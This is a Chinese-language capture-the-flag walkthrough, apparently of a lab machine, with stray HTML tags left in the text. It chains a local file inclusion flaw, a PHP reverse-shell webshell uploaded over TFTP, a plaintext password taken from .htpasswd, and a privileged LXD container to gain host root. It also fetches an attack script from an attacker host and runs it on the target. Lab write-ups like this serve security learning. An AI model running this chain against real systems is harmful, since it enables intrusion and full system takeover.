LXD 特权提升漏洞利用教学文档<\/h1>

1. 目标系统侦察<\/h2>

1.1 UDP 服务识别<\/h3>
目标机器上运行着 TFTP (Trivial File Transfer Protocol) 服务，使用 UDP 69 端口：<\/p>
nmap -sU 10.129.232.86 -p 69<\/span>
<\/span><\/span><\/code><\/pre>1.2 Web 服务漏洞识别<\/h3>
端口 80 上的网页存在本地文件包含 (Local File Inclusion, LFI) 漏洞：<\/p>
nmap -sC -sV 10.129.232.86 --min-rate 1000<\/span>
<\/span><\/span>curl http:\/\/10.129.232.86\/?file=<\/span>\/etc\/passwd
<\/span><\/span><\/code><\/pre>2. TFTP 服务利用<\/h2>
2.1 TFTP 默认目录<\/h3>
TFTP 默认存储文件的系统目录：<\/p>
\/var\/lib\/tftpboot\/
<\/code><\/pre>
2.2 利用 LFI 上传 Webshell<\/h3>

准备 PHP 反弹 shell 脚本 (webshell.php)<\/li>
通过 TFTP 上传 webshell：<\/li>
<\/ol>
tftp 10.129.226.19
<\/span><\/span>tftp> put webshell.php
<\/span><\/span><\/code><\/pre>
验证上传成功：<\/li>
<\/ol>
curl http:\/\/10.129.226.19\/?file=<\/span>php:\/\/filter\/read=<\/span>convert.base64-encode\/resource=<\/span>\/var\/lib\/tftpboot\/webshell.php|base64 -d
<\/span><\/span><\/code><\/pre>
触发反弹 shell：<\/li>
<\/ol>
curl 'http:\/\/10.129.226.19\/?file=\/var\/lib\/tftpboot\/webshell.php'<\/span>
<\/span><\/span><\/code><\/pre>3. 横向移动<\/h2>
3.1 发现敏感文件<\/h3>
在 web 服务器目录中发现可用于横向移动的文件：<\/p>
ls -al \/var\/www\/html
<\/span><\/span>.htpasswd
<\/span><\/span><\/code><\/pre>3.2 提升 shell 交互性<\/h3>
SHELL=<\/span>\/bin\/bash script -q \/dev\/null
<\/span><\/span><\/code><\/pre>3.3 查看凭据文件<\/h3>
cat \/var\/www\/html\/.htpasswd
<\/span><\/span><\/code><\/pre>3.4 切换用户<\/h3>
使用发现的凭据切换至 mike 用户：<\/p>
su mike
<\/span><\/span>密码：Sheffield19
<\/span><\/span><\/code><\/pre>4. LXD 特权提升<\/h2>
4.1 用户组信息<\/h3>
用户 mike 属于 lxd 组，可用于特权提升：<\/p>
groups mike
<\/span><\/span><\/code><\/pre>4.2 利用 Alpine 镜像<\/h3>
用于容器攻击的小型 Linux 发行版：<\/p>
alpine
<\/code><\/pre>
4.3 准备攻击环境<\/h3>

本地构建 Alpine 镜像：<\/li>
<\/ol>
wget https:\/\/raw.githubusercontent.com\/saghul\/lxd-alpine-builder\/master\/build-alpine
<\/span><\/span>chmod a+x build-alpine
<\/span><\/span>sudo .\/build-alpine
<\/span><\/span><\/code><\/pre>
启动 HTTP 服务器共享镜像：<\/li>
<\/ol>
python3 -m http.server 80<\/span>
<\/span><\/span><\/code><\/pre>
在目标机器上下载攻击脚本和镜像：<\/li>
<\/ol>
cd \/tmp
<\/span><\/span>wget http:\/\/10.10.16.7\/exp.tar.gz
<\/span><\/span>wget http:\/\/10.10.16.7\/lxd.sh
<\/span><\/span>chmod a+x lxd.sh
<\/span><\/span>.\/lxd.sh -f exp.tar.gz
<\/span><\/span><\/code><\/pre>4.4 关键特权标志<\/h3>
设置容器拥有主机 root 权限的关键标志：<\/p>
security.privileged=true
<\/code><\/pre>
5. 获取 Flag<\/h2>
5.1 用户 Flag<\/h3>
find \/ -name user.txt 2>\/dev\/null
<\/span><\/span>cat \/home\/mike\/user.txt
<\/span><\/span><\/code><\/pre>用户 Flag: a56ef91d70cfbf2cdb8f454c006935a1<\/code><\/p>
5.2 根 Flag<\/h3>
当主机文件系统挂载在容器的 \/mnt 目录时：<\/p>
find \/ -name root.txt
<\/span><\/span>cat \/mnt\/root\/root\/root.txt
<\/span><\/span><\/code><\/pre>根 Flag: c693d9c7499d9f572ee375d4c14c7bcf<\/code><\/p>
技术要点总结<\/h2>

LFI 漏洞利用<\/strong>：通过文件包含漏洞读取系统文件和上传 webshell<\/li>
TFTP 匿名上传<\/strong>：利用 TFTP 无需认证的特性上传恶意文件<\/li>
LXD 组特权提升<\/strong>：利用 lxd 组成员身份创建特权容器<\/li>
Alpine 镜像利用<\/strong>：使用轻量级 Alpine 镜像快速构建攻击环境<\/li>
特权容器挂载<\/strong>：通过 security.privileged=true 获取主机 root 权限<\/li>
<\/ol>
整个攻击链展示了从初始侦察到最终特权提升的完整过程，重点在于利用多个服务的配置缺陷和权限设计问题实现逐步提权。<\/p>